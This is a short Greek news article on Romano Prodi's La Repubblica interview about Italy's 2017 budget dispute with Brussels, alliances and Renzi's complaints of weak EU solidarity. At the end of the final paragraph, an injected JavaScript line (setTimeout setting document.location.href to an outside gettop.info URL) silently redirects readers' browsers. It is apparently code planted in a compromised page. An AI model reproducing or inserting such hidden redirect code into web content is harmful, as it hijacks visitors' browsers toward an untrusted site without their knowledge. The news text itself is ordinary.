Πρόντι: Ζητάμε Ευρώπη διαφορετική, αλλά χρειάζονται συμμαχίες

0
7

 

Σε συνέντευξή του στην εφημερίδα La Repubblica ο πρώην πρόεδρος της Ευρωπαϊκής Επιτροπής Ρομάνο Πρόντι σημείωσε: «Είναι αδιαμφισβήτητο δικαίωμα να ζητάμε μια Ευρώπη διαφορετική από την σημερινή, αλλά για την επίτευξη του στόχου αυτού, χρειάζονται προγράμματα και συμμαχίες».

Σύμφωνα με τον Πρόντι, «το να χτυπά, κανείς την γροθιά στο τραπέζι είναι ένα μέσο τακτικής, και όχι στρατηγικής προσέγγισης». Από τη μία, ο Ιταλός κεντροαριστερός πολιτικός διαπιστώνει ότι «είναι σε εξέλιξη μια διαπραγμάτευση με την απειλή να χρησιμοποιήσει βέτο, η Ιταλία βρίσκεται σε θέση ισχύος, μέχρι οι Βρυξέλλες να εκφρασθούν οριστικά σε σχέση με τον ιταλικό κρατικό προϋπολογισμό του 2017».

Από την άλλη, όμως, ο Ρομάνο Πρόντι υπογραμμίζει ότι «μια στάση υπερβολικής αμφισβήτησης μπορεί να μην επιτρέψει στην Ιταλία να συνάψει τις αναγκαίες συμμαχίες για να μπορέσει να πετύχει τους βασικούς της στόχους».

Ο πρώην πρόεδρος της Κομισιόν είναι της άποψης ότι «ο Ρέντσι δικαίως διαμαρτύρεται για έλλειψη ευρωπαϊκής αλληλεγγύης», ομολογώντας πως «είναι μια στάση που εξέπληξε και τον ίδιο».

Παράλληλα, χαρακτηριζει στρατηγικό λάθος να ενταχθεί ο Ιταλός πρωθυπουργός στην ομάδα εκείνων που θεωρούν τις Βρυξέλλες μόνον ως τον έτερο διαπραγματευτή που βρίσκεται στην άλλη άκρη του τραπεζιού. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here